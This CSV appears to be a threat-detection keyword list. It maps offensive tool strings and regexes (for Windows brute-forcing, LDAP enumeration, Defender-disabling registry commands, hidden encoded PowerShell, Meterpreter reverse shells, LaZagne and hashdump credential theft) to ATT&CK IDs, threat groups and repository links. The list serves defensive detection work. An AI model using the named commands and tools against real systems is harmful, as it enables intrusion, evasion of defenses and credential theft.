"*WinBruteLogon.exe*",".{0,1000}WinBruteLogon\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","62679"
"*WinBruteLogon.exe*",".{0,1000}WinBruteLogon\.exe.{0,1000}","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","N/A","10","1138","191","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z","62680"
"*WinBruteLogon.exe*",".{0,1000}WinBruteLogon\.exe.{0,1000}","offensive_tool_keyword","win-brute-logon","Crack any Microsoft Windows users password without any privilege (Guest account included)","T1110.001 - T1078.001 - T1187 - T1055 - T1547 - T1003.005","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/PhrozenIO/win-brute-logon","1","1","N/A","N/A","7","10","1138","191","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z","62681"
"*WinBruteLogon.res*",".{0,1000}WinBruteLogon\.res.{0,1000}","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","N/A","10","1138","191","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z","62682"
"*win-brute-logon-master.zip*",".{0,1000}win\-brute\-logon\-master\.zip.{0,1000}","offensive_tool_keyword","win-brute-logon","Crack any Microsoft Windows users password without any privilege (Guest account included)","T1110.001 - T1078.001 - T1187 - T1055 - T1547 - T1003.005","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/PhrozenIO/win-brute-logon","1","1","N/A","N/A","7","10","1138","191","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z","62683"
"*WinCreds.exe*",".{0,1000}WinCreds\.exe.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","62684"
"*windapsearch --dc *",".{0,1000}windapsearch\s\-\-dc\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","62685"
"*windapsearch.py*",".{0,1000}windapsearch\.py.{0,1000}","offensive_tool_keyword","windapsearch","Python script to enumerate users - groups and computers from a Windows domain through LDAP queries","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/ropnop/windapsearch","1","1","N/A","AD Enumeration","7","9","866","154","2022-04-20T07:40:42Z","2016-08-10T21:43:30Z","62686"
"*windapsearch_enum*",".{0,1000}windapsearch_enum.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","62687"
"*windapsearch_py2.py*",".{0,1000}windapsearch_py2\.py.{0,1000}","offensive_tool_keyword","windapsearch","Python script to enumerate users - groups and computers from a Windows domain through LDAP queries","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/ropnop/windapsearch","1","1","N/A","AD Enumeration","7","9","866","154","2022-04-20T07:40:42Z","2016-08-10T21:43:30Z","62688"
"*windapsearch-master*",".{0,1000}windapsearch\-master.{0,1000}","offensive_tool_keyword","windapsearch","Python script to enumerate users - groups and computers from a Windows domain through LDAP queries","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/ropnop/windapsearch","1","1","N/A","AD Enumeration","7","9","866","154","2022-04-20T07:40:42Z","2016-08-10T21:43:30Z","62689"
"*WinDefenderKiller*",".{0,1000}WinDefenderKiller.{0,1000}","offensive_tool_keyword","WinDefenderKiller","Windows Defender Killer | C++ Code Disabling Permanently Windows Defender using Registry Keys","T1562.001 - T1055.002 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/S12cybersecurity/WinDefenderKiller","1","1","N/A","N/A","10","5","448","67","2023-07-27T11:06:24Z","2023-07-25T10:32:25Z","62690"
"*winDefKiller.exe*",".{0,1000}winDefKiller\.exe.{0,1000}","offensive_tool_keyword","WinDefenderKiller","Windows Defender Killer | C++ Code Disabling Permanently Windows Defender using Registry Keys","T1562.001 - T1055.002 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/S12cybersecurity/WinDefenderKiller","1","1","N/A","N/A","10","5","448","67","2023-07-27T11:06:24Z","2023-07-25T10:32:25Z","62691"
"*WindfarmDynamite.cdproj*",".{0,1000}WindfarmDynamite\.cdproj.{0,1000}","offensive_tool_keyword","WindfarmDynamite","WindfarmDynamite is a proof-of-concept for code injection using the Windows Notification Facility (WNF). Of interest here is that this avoids suspect thread orchestration APIs (like CreateRemoteThread)","T1055.013 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/WindfarmDynamite","1","1","N/A","N/A","N/A","10","1131","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z","62692"
"*WindfarmDynamite.exe*",".{0,1000}WindfarmDynamite\.exe.{0,1000}","offensive_tool_keyword","WindfarmDynamite","WindfarmDynamite is a proof-of-concept for code injection using the Windows Notification Facility (WNF). Of interest here is that this avoids suspect thread orchestration APIs (like CreateRemoteThread)","T1055.013 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/WindfarmDynamite","1","1","N/A","N/A","N/A","10","1131","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z","62693"
"*WindfarmDynamite.sln*",".{0,1000}WindfarmDynamite\.sln.{0,1000}","offensive_tool_keyword","WindfarmDynamite","WindfarmDynamite is a proof-of-concept for code injection using the Windows Notification Facility (WNF). Of interest here is that this avoids suspect thread orchestration APIs (like CreateRemoteThread)","T1055.013 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/WindfarmDynamite","1","1","N/A","N/A","N/A","10","1131","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z","62694"
"*Windows Bind TCP ShellCode - BOF*",".{0,1000}Windows\sBind\sTCP\sShellCode\s\-\sBOF.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","62695"
"*Windows Credentials Editor v1.3beta*",".{0,1000}Windows\sCredentials\sEditor\sv1\.3beta.{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","0","#content","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","62696"
"*Windows Defender' DisableAntiSpyware 1 -Type Dword -Force -ea 0*",".{0,1000}Windows\sDefender\'\sDisableAntiSpyware\s1\s\-Type\sDword\s\-Force\s\-ea\s0.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#registry","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","62697"
"*'Windows Defender has blocked some of our Features.Please Turn off Windows Defender and run again*",".{0,1000}\'Windows\sDefender\shas\sblocked\ssome\sof\sour\sFeatures\.Please\sTurn\soff\sWindows\sDefender\sand\srun\sagain.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection  - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","62698"
"*Windows Defender Security Center\\Notifications' DisableNotifications 1 -Type Dword -ea 0*",".{0,1000}Windows\sDefender\sSecurity\sCenter\\\\Notifications\'\sDisableNotifications\s1\s\-Type\sDword\s\-ea\s0.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#registry","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","62699"
"*Windows Defender Security Center\Notifications' DisableNotifications 1 -Type Dword -ea 0*",".{0,1000}Windows\sDefender\sSecurity\sCenter\\Notifications\'\sDisableNotifications\s1\s\-Type\sDword\s\-ea\s0.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#registry","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","62700"
"*Windows Defender"" DisableAntiSpyware 1 -Type Dword -Force -ea 0*",".{0,1000}Windows\sDefender\""\sDisableAntiSpyware\s1\s\-Type\sDword\s\-Force\s\-ea\s0.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#registry","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","62701"
"*Windows Downdate: Craft any downgrading Windows Updates*",".{0,1000}Windows\sDowndate\:\sCraft\sany\sdowngrading\sWindows\sUpdates.{0,1000}","offensive_tool_keyword","WindowsDowndate","A tool that takes over Windows Updates to craft custom downgrades and expose past fixed vulnerabilities","T1072 - T1486 - T1505.002 - T1495 - T1499.004","TA0005 - TA0004 - TA0003 ","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/WindowsDowndate","1","0","N/A","N/A","10","7","663","88","2024-10-26T10:18:49Z","2024-01-08T19:42:47Z","62702"
"*windows go build -o proxy.exe cmd/proxy/main.go*",".{0,1000}windows\sgo\sbuild\s\-o\sproxy\.exe\scmd\/proxy\/main\.go.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","N/A","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","62703"
"*-WindowS Hidden -ep Bypass -enc $b64FileServerMonitoringScript*",".{0,1000}\-WindowS\sHidden\s\-ep\sBypass\s\-enc\s\$b64FileServerMonitoringScript.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","62704"
"*-WindowS Hidden -ep Bypass -enc $b64monitoringScript*",".{0,1000}\-WindowS\sHidden\s\-ep\sBypass\s\-enc\s\$b64monitoringScript.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","62705"
"*Windows keyboard hook installed & log exfiltration timer started*",".{0,1000}Windows\skeyboard\shook\sinstalled\s\&\slog\sexfiltration\stimer\sstarted.{0,1000}","offensive_tool_keyword","peeping-tom","Remote keylogger for Windows written in C++","T1056.001 - T1123 - T1129 - T1113","TA0006 - TA0008 - TA0009","N/A","Dispossessor","Collection","https://github.com/shehzade/peeping-tom","1","0","#content","keylogger","10","1","3","0","2022-07-24T09:31:59Z","2022-04-15T14:16:41Z","62706"
"*Windows Meterpreter Staged Reverse TCP (x64*",".{0,1000}Windows\sMeterpreter\sStaged\sReverse\sTCP\s\(x64.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","62707"
"*Windows Meterpreter Stageless Reverse TCP (x64)*",".{0,1000}Windows\sMeterpreter\sStageless\sReverse\sTCP\s\(x64\).{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","62708"
"*Windows Staged JSP Reverse TCP*",".{0,1000}Windows\sStaged\sJSP\sReverse\sTCP.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","62709"
"*Windows Staged Reverse TCP (x64)*",".{0,1000}Windows\sStaged\sReverse\sTCP\s\(x64\).{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","62710"
"*Windows Stageless Reverse TCP (x64)*",".{0,1000}Windows\sStageless\sReverse\sTCP\s\(x64\).{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","62711"
"*windows*lsa_secrets.py*",".{0,1000}windows.{0,1000}lsa_secrets\.py.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext   APIs   custom algorithms   databases   etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","62712"
"*windows/beacon_smb/*",".{0,1000}windows\/beacon_smb\/.{0,1000}","offensive_tool_keyword","cobaltstrike","cobaltstrike default content strings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","#content","N/A","10","10","N/A","N/A","N/A","N/A","62717"
"*windows/c_payload_util*",".{0,1000}windows\/c_payload_util.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62718"
"*windows/gather/cachedump*",".{0,1000}windows\/gather\/cachedump.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","Framework","https://github.com/rapid7/metasploit-payloads","1","0","N/A","N/A","10","10","1819","689","2025-02-13T15:01:44Z","2014-04-03T21:18:24Z","62719"
"*windows/gather/hashdump*",".{0,1000}windows\/gather\/hashdump.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","Framework","https://github.com/rapid7/metasploit-payloads","1","0","N/A","N/A","10","10","1819","689","2025-02-13T15:01:44Z","2014-04-03T21:18:24Z","62720"
"*Windows/lazagne.spec*",".{0,1000}Windows\/lazagne\.spec.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext   APIs   custom algorithms   databases   etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","62721"
"*windows/meterpreter/bind_tcp*",".{0,1000}windows\/meterpreter\/bind_tcp.{0,1000}","offensive_tool_keyword","metasploit","exploits often used by ransomware groups","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven - Dispossessor","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62722"
"*windows/meterpreter/reverse_https*",".{0,1000}windows\/meterpreter\/reverse_https.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","62723"
"*windows/samdump.go*",".{0,1000}windows\/samdump\.go.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","62724"
"*windows/shell_reverse_tcp*",".{0,1000}windows\/shell_reverse_tcp.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62725"
"*windows/smb/ms17_010_psexec*",".{0,1000}windows\/smb\/ms17_010_psexec.{0,1000}","offensive_tool_keyword","metasploit","exploit used by Dispossessor ransomware group","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","Dispossessor","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62726"
"*Windows/System32/cmdlol.exe*",".{0,1000}Windows\/System32\/cmdlol\.exe.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","62727"
"*windows/x64/meterpreter/reverse_tcp*",".{0,1000}windows\/x64\/meterpreter\/reverse_tcp.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","Defense Evasion","https://github.com/0xHossam/Killer","1","1","N/A","N/A","10","9","804","128","2024-07-02T10:24:43Z","2023-04-08T16:29:52Z","62728"
"*windows/x64/meterpreter/reverse_tcp*",".{0,1000}windows\/x64\/meterpreter\/reverse_tcp.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","62729"
"*windows/x64/meterpreter/reverse_tcp*",".{0,1000}windows\/x64\/meterpreter\/reverse_tcp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","62730"
"*windows/x64/meterpreter_reverse_tcp*",".{0,1000}windows\/x64\/meterpreter_reverse_tcp.{0,1000}","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","Defense Evasion","https://github.com/9emin1/charlotte","1","1","N/A","N/A","10","10","976","211","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z","62731"
"*windows/x64/meterpreter_reverse_tcp*",".{0,1000}windows\/x64\/meterpreter_reverse_tcp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","62732"
"*windows/x64/meterpreter_reverse_tcp*",".{0,1000}windows\/x64\/meterpreter_reverse_tcp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","62733"
"*windows/x64/shell_reverse_tcp*",".{0,1000}windows\/x64\/shell_reverse_tcp.{0,1000}","offensive_tool_keyword","metasploit","exploit used by Dispossessor ransomware group","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","Dispossessor","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62734"
